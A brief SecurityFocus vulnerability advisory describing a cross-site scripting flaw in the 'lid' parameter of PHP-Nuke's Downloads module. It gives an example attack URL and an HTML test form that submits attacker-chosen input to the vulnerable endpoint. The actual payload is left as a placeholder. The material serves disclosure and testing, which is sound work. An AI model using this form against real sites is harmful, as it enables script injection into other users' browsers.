PHP-Nuke Downloads Module Lid Parameter Cross-Site Scripting Vulnerability

The following example is available:

http://www.example.com/[nuke_dir]/modules.php?name=Downloads&d_op=outsidedownloadsetup&lid=[XSS]

To test XSS for example in http://www.example.com/[nuke_dir]/modules.php?name=Downloads&d_op=outsidedownloadsetup&lid=[XSS] we can
create a form.

test.html :
-----------
<form name="mantra" method="POST" action="http://www.example.com/[nuke_dir]/modules.php">
<p>XSS:
<input type="text" name="lid">
<br>
<input type="hidden" name="name" value="Downloads">
<br>
<input type="hidden" name="d_op" value="outsidedownloadsetup">
</p>
<p>
<input type="submit" name="Submit" value="Go!">
<br>
</p>


 

Privacy Statement
Copyright 2010, SecurityFocus